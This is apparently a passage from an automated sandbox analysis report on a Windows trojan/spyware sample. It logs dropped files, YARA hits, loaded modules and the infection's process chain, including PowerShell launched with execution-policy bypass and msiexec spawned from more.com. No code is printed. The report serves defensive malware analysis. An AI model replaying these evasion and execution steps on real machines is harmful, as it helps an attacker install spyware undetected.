                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA198BA304_2_00007FFBA198BA30
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19FCA804_2_00007FFBA19FCA80
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D82604_2_00007FFBA19D8260
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA198D1D04_2_00007FFBA198D1D0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19FF1A04_2_00007FFBA19FF1A0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19E39904_2_00007FFBA19E3990
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA197A9604_2_00007FFBA197A960
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1A438E04_2_00007FFBA1A438E0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19E3C904_2_00007FFBA19E3C90
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1A00BD04_2_00007FFBA1A00BD0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D93B04_2_00007FFBA19D93B0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1A023B04_2_00007FFBA1A023B0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D74004_2_00007FFBA19D7400
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1A46C004_2_00007FFBA1A46C00
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19894104_2_00007FFBA1989410
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D1AE04_2_00007FFBA19D1AE0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D3E304_2_00007FFBA19D3E30
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D26904_2_00007FFBA19D2690
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1976E604_2_00007FFBA1976E60
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D4E604_2_00007FFBA19D4E60
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA198AE604_2_00007FFBA198AE60
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA197EDC04_2_00007FFBA197EDC0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1989DA04_2_00007FFBA1989DA0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA198C5304_2_00007FFBA198C530
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D8D704_2_00007FFBA19D8D70
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA197FD004_2_00007FFBA197FD00
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D0CF04_2_00007FFBA19D0CF0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19CE7404_2_00007FFBA19CE740
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19D8F504_2_00007FFBA19D8F50
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA198DF504_2_00007FFBA198DF50
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19E36F04_2_00007FFBA19E36F0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD15007_2_00007FFBA1AD1500
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD23CE7_2_00007FFBA1AD23CE
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD27C07_2_00007FFBA1AD27C0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD18117_2_00007FFBA1AD1811
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1B957_2_00007FFBA1AD1B95
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1F2D7_2_00007FFBA1AD1F2D
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1BE23807_2_00007FFBA1BE2380
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AF42D07_2_00007FFBA1AF42D0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B426807_2_00007FFBA1B42680
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B7A5307_2_00007FFBA1B7A530
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD105F7_2_00007FFBA1AD105F
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B826F07_2_00007FFBA1B826F0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD12DA7_2_00007FFBA1AD12DA
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD10417_2_00007FFBA1AD1041
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD12947_2_00007FFBA1AD1294
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1AB47_2_00007FFBA1AD1AB4
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1BE0DF07_2_00007FFBA1BE0DF0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1E337_2_00007FFBA1AD1E33
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1BE10407_2_00007FFBA1BE1040
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD26F87_2_00007FFBA1AD26F8
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD12AD7_2_00007FFBA1AD12AD
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD24AF7_2_00007FFBA1AD24AF
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD26087_2_00007FFBA1AD2608
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1ABE7_2_00007FFBA1AD1ABE
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B754507_2_00007FFBA1B75450
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD17B77_2_00007FFBA1AD17B7
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD18667_2_00007FFBA1AD1866
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1C835A07_2_00007FFBA1C835A0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1E6A7_2_00007FFBA1AD1E6A
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD244B7_2_00007FFBA1AD244B
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1AC37_2_00007FFBA1AD1AC3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD11CC7_2_00007FFBA1AD11CC
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1B637_2_00007FFBA1AD1B63
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B879F07_2_00007FFBA1B879F0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1B407_2_00007FFBA1AD1B40
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD13437_2_00007FFBA1AD1343
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1D1B7_2_00007FFBA1AD1D1B
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD22207_2_00007FFBA1AD2220
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B7DB307_2_00007FFBA1B7DB30
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD1FC37_2_00007FFBA1AD1FC3
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B29E907_2_00007FFBA1B29E90
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B7DE407_2_00007FFBA1B7DE40
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD22E87_2_00007FFBA1AD22E8
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD25277_2_00007FFBA1AD2527
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1B780907_2_00007FFBA1B78090
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 7_2_00007FFBA1AD11187_2_00007FFBA1AD1118
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll 52415829D85C06DF8724A3D3D00C98F12BEABF5D6F3CBAD919EC8000841A86E8
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: String function: 00007FFBA1AD1BD6 appears 44 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: String function: 00007FFBA1AD401B appears 141 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: String function: 00007FFBA1AD1055 appears 429 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: String function: 00007FFBA1AD5C77 appears 237 times
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: String function: 00007FFBA1AD4593 appears 36 times
                    Source: lang-1058.dll.1.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM)
                    Source: libvlc.dll.1.drStatic PE information: Number of sections : 12 > 10
                    Source: libvlccore.dll.1.drStatic PE information: Number of sections : 12 > 10
                    Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: lang-1049.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-private-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: lang-1058.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                    Source: LiteRes.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Qt5Core.dll.1.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
                    Source: Qt5Core.dll.4.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@19/176@2/2
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1A46E00 ?shared_null@QListData@@2UData@1@B,CertOpenSystemStoreW,CertFindCertificateInStore,??0QByteArray@@QEAA@PEBDH@Z,?append@QListData@@QEAAPEAPEAXXZ,??1QByteArray@@QEAA@XZ,CertFindCertificateInStore,CertCloseStore,4_2_00007FFBA1A46E00
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19FF1A0 CoCreateInstance,?isWarningEnabled@QLoggingCategory@@QEBA_NXZ,??0QMessageLogger@@QEAA@PEBDH00@Z,?warning@QMessageLogger@@QEBA?AVQDebug@@XZ,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@AEBVQString@@@Z,??1QString@@QEAA@XZ,??1QDebug@@QEAA@XZ,?isWarningEnabled@QLoggingCategory@@QEBA_NXZ,??0QMessageLogger@@QEAA@PEBDH00@Z,?warning@QMessageLogger@@QEBA?AVQDebug@@XZ,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@AEBVQString@@@Z,??1QString@@QEAA@XZ,??1QDebug@@QEAA@XZ,?isWarningEnabled@QLoggingCategory@@QEBA_NXZ,??0QMessageLogger@@QEAA@PEBDH00@Z,?warning@QMessageLogger@@QEBA?AVQDebug@@XZ,??6QDebug@@QEAAAEAV0@PEBD@Z,??6QDebug@@QEAAAEAV0@AEBVQString@@@Z,??1QString@@QEAA@XZ,??1QDebug@@QEAA@XZ,4_2_00007FFBA19FF1A0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HuXYHwrC.zipJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1736:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oa1sukry.yfu.ps1Jump to behavior
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll, type: DROPPED
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1"Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: qt5core.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: steam_api64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: libcrypto-1_1-x64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: qt5network.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: libssl-1_1-x64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140_1.dllJump to behavior
